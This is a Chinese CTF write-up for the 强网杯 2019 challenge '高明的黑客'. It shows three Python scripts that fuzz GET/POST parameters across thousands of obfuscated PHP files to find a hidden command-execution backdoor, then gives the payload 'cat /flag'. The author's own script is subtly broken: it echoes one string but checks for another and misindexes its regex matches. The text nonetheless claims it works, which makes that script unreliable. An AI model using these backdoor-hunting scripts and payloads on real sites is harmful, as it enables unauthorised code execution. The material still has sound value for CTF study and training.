标签：load   sky   pos   params   listdir   std   readlines   lock   res   

题目一览

进局子的前端：

那么先访问一下www.tar.gz，果然可以下载“

然后我人就傻掉了……

全是些莫名其妙的东西，难不成php也有花代码这么一说？

考点：fuzz脚本的编写

其实这些文件都是有讲究的，既然告诉你网站已经被黑了，这些源码中其实就藏着??。

那其实思路就简单了……找出这些源码中所有的GET和POST请求，模拟请求一遍，看看那个能RCE不就行了。

放上我的一波脚本……还是太菜了，就写了GET的，依旧慢的像蜗牛：

import requests
import re
import os

path = ‘****‘ #文件路径
url = ‘‘ #url
r = re.compile(br"\$_GET\[‘(\w+)‘\]")；#匹配$_GET[‘XXX‘]
f_list = os.listdir(path)

for file in f_list: #逐步读文件
    f = open(path + file)
    con = f.read() 
    tmp = r.findall(con) #遍历所有GET请求
    for j in tmp:
        exp = url + file + ‘?‘ + j[1] + ‘=echo fuzz;‘ #构造GET请求的URL，带参传echo
        res = requests.get(exp).text
        if ‘777‘ in res: #若找到，输出
            print(‘Find ‘+exp)
            exit(0)

不过是能跑出来的：

直接构造payload：

/xk0SzyKwfzw.php?Efa5BVG=cat /flag

拿到flag：

这里贴一下飘零师傅的脚本：运用了线程池，速度快了很多（py2）

import requests
from multiprocessing import Pool

base_url = "http://localhost:8888/src/"
base_dir = "/Desktop/site/src/"
file_list = [‘zzt4yxY_RMa.php‘,........ ‘m_tgKOIy5uj.php‘, ‘aEFo52YSPrp.php‘, ‘Hk3aCSWcQZK.php‘, ‘RXoiLRYSOKE.php‘]

def extracts(f):
    gets = []
    with open(base_dir + f, ‘r‘) as f:
        lines = f.readlines()
        lines = [i.strip() for i in lines]
        for line in lines:

            if line.find("$_GET[‘") > 0:
                start_pos = line.find("$_GET[‘") + len("$_GET[‘")
                end_pos = line.find("‘", start_pos)                
                gets.append(line[start_pos:end_pos])

    return gets

def exp(start,end):
    for i in range(start,end):
        filename = file_list[i]
        gets = extracts(filename)
        print "try: %s"%filename 
        for get in gets:
            now_url = "%s%s?%s=%s"%(base_url,filename,get,‘echo "sky cool";‘)
            r = requests.get(now_url)
            if ‘sky cool‘ in r.content:
                print now_url
                break
    print "%s~%s not found!"%(start,end)


def main():
    pool = Pool(processes=15)    # set the processes max number 3
    for i in range(0,len(file_list),len(file_list)/15):
        pool.apply_async(exp,(i,i+len(file_list)/15,))
    pool.close()
    pool.join()

 
if __name__ == "__main__":
    main()

当然还有赵师傅的脚本了，工整的很：（py3）

import os
import threading
from concurrent.futures.thread import ThreadPoolExecutor

import requests

session = requests.Session()

path = "/Users/jinzhao/PhpstormProjects/qwb/web2/"  # 文件夹目录
files = os.listdir(path)  # 得到文件夹下的所有文件名称

mutex = threading.Lock()
pool = ThreadPoolExecutor(max_workers=50)

def read_file(file):
    f = open(path + "/" + file);  # 打开文件
    iter_f = iter(f);  # 创建迭代器
    str = ""
    for line in iter_f:  # 遍历文件，一行行遍历，读取文本
        str = str + line

    # 获取一个页面内所有参数
    start = 0
    params = {}
    while str.find("$_GET[‘", start) != -1:
        pos2 = str.find("‘]", str.find("$_GET[‘", start) + 1)
        var = str[str.find("$_GET[‘", start) + 7: pos2]
        start = pos2 + 1

        params[var] = ‘echo("glzjin");‘

        # print(var)

    start = 0
    data = {}
    while str.find("$_POST[‘", start) != -1:
        pos2 = str.find("‘]", str.find("$_POST[‘", start) + 1)
        var = str[str.find("$_POST[‘", start) + 8: pos2]
        start = pos2 + 1

        data[var] = ‘echo("glzjin");‘

        # print(var)

    # eval test
    r = session.post(‘http://localhost:11180/web2/‘ + file, data=data, params=params)
    if r.text.find(‘glzjin‘) != -1:
        mutex.acquire()
        print(file + " found!")
        mutex.release()

    # assert test
    for i in params:
        params[i] = params[i][:-1]

    for i in data:
        data[i] = data[i][:-1]

    r = session.post(‘http://localhost:11180/web2/‘ + file, data=data, params=params)
    if r.text.find(‘glzjin‘) != -1:
        mutex.acquire()
        print(file + " found!")
        mutex.release()

    # system test
    for i in params:
        params[i] = ‘echo glzjin‘

    for i in data:
        data[i] = ‘echo glzjin‘

    r = session.post(‘http://localhost:11180/web2/‘ + file, data=data, params=params)
    if r.text.find(‘glzjin‘) != -1:
        mutex.acquire()
        print(file + " found!")
        mutex.release()

    # print("====================")

for file in files:  # 遍历文件夹
    if not os.path.isdir(file):  # 判断是否是文件夹，不是文件夹才打开
        # read_file(file)

        pool.submit(read_file, file)

我还是别说我学过python了……

[强网杯 2019]高明的黑客

标签：load   sky   pos   params   listdir   std   readlines   lock   res   

原文地址：https://www.cnblogs.com/keelongz/p/12643812.html